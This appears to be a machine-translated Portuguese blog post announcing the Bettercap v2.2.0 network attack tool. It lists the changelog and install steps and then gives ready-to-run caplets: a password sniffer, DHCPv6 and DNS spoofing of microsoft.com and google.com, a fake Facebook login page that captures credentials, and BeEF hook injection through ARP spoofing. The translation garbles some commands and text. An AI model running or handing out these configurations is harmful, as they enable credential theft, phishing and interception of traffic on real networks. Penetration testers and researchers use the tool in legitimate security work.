Bettercap v2.2.0 releases oficiais: a nova versão do bettercap

Resultado de imagem para Bettercap v2.2.0



Novas características
  • Os módulos habilitados por padrão agora podem ser controlados com o  -autostart argumento.
  • Implementado  events.stream.output (fecha  # 169).
  • -no-colors Argumento implementado  .
  • Implementado basic sslstrip (ref  # 154)
  • Roteador de solicitação comutada e adicionou mais caminhos em api.rest
  • O módulo Wifi agora pode usar um arquivo pcap para recon desativado.
  • Edição  # 157: wifi.recon agora pode selecionar um ou vários canais (separados por vírgulas) e mostrar apenas os canais selecionados.

  • Faça a análise e validação de pacotes 802.11 mais robusta (corrige  # 167)
  • Faça o macros ALTQ e as mensagens relacionadas ao firewall em silêncio (corrige  # 162)
  • Não usando uma compilação estática no linux / amd64 para evitar problemas glibc (correções  # 155)
  • /api/events n parâmetro não funcionou como esperado (correções  # 158)
  • Corrigido bug no ble.enum (correções  # 156)
  • Explicitamente imprimir o nome da interface se não puder configurá-lo no modo monitor (ref  # 127)
  • Corrige um erro que fez com que net.sniff não imprimisse saída se net.sniff.local não for verdadeira (corrige  # 138)
  • Agora o ambiente não é mais persistente por padrão (fecha  # 146)

Diversos
  • O Dockerfile atualizado como compilação estática do gopacket não é mais usado.
  • Controlador Reflexo api.rest
  • Verificações do estado do módulo refatorado em Configurar métodos para consistência

Download

Docker
Neste repositório, o BetterCAP é contêinerado usando o  Alpine Linux - uma distribuição Linux leve e orientada para a segurança baseada no musl libc e no busybox. A imagem Docker resultante é relativamente pequena e fácil de gerenciar as dependências.
Para tirar a versão BetterCAP mais recente da imagem:
$ docker pull evilsocket / bettercap-ng
Para correr:
$ docker run -it -privileged -net = host evilsocket / bettercap-ng -h
Compilando
Certifique-se de ter um Ambiente Go> = 1.8 configurado corretamente, que $ GOPATH / bin está em $ PATH e o pacote libpcap-dev instalado para o seu sistema, então:
$ go get github.com/evilsocket/bettercapng
Para mostrar as opções da linha de comando:
$ sudo bettercap-ng -h

Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -debug
        Print debug messages.
  -eval string
        Run a command, used to set variables via command line.
  -iface string
        Network interface to bind to.
  -no-history
        Disable history file.
  -silent
        Suppress all logs which are not errors.


Caplets
As sessões interativas podem ser escritas com  .cap arquivos, ou  caplets, a seguir, são alguns exemplos básicos, veja a  capletspasta para mais.
caplets / simple-password-sniffer.cap
Sniffer Senha Simples.
# keep reading arp table for network mapping
net.recon on
# setup a regular expression for packet payloads
set net.sniff.regexp .*password=.+
# set the sniffer output file
set net.sniff.output passwords.pcap
# start the sniffer
net.sniff on


caplets / mitm6.cap
Redirecione as solicitações de DNS usando as respostas DHCPv6, inicie um servidor HTTP e um spoof de DNS para microsoft.com e google.com.
# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com

# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www

# check who's alive on the network
net.recon on
# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on

# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen
events.clear
clear


caplets / rest-api.cap
Comece uma API de repouso.
# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082

# actively probe network for new hosts
net.probe on
net.recon on

# enjoy /api/session and /api/events
api.rest on


Obtenha informações sobre a sessão atual:
curl -k -user bpcap: bcap https: // bettercap-ip: 8083 / api / session
Execute um comando na sessão interativa atual:
curl -k -user bcap: bcap https: // bettercap-ip: 8083 / api / session -H "Content-Type: application / json" -X POST -d '{"cmd": "net.probe on"} '
Obtenha os últimos 50 eventos:
curl -k -user bpcap: bcap https: // bettercap-ip: 8083 / api / events? n = 50
Eventos claros:
curl -k -user bpcap: bcap -X DELETE https: // bettercap-ip: 8083 / api / events
caplets / fb -phish.cap
Este caplet criará uma página falsa de login do Facebook na porta 80, interceptará as tentativas de login usando as  http.proxycredenciais de impressão e redirecionará o destino para o Facebook real.
Certifique-se de criar a pasta primeiro:
$ cd caplets/www/
$ make
set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/

set http.proxy.script caplets/fb-phish.js

http.proxy on
http.server on




O  caplets/fb-phish.js arquivo de script do proxy:

caplets / beef-inject.cap

Use um script de proxy para injetar um gancho de BEEF javascript:
# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script caplets/beef-inject.js
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on




O  caplets/beef.inject.js arquivo de script do proxy:
Modo Interativo
O modo interativo permite que você comece e pare módulos manualmente, modifique as opções e aplique novas regras de firewall sobre o assunto, para mostrar o tipo de menu de ajuda  help, você pode usar a ajuda específica do módulo usando  help module-name.
Copyright (C) 2018 Simone Margaritelli








Nenhum comentário:

Postar um comentário

Recomendado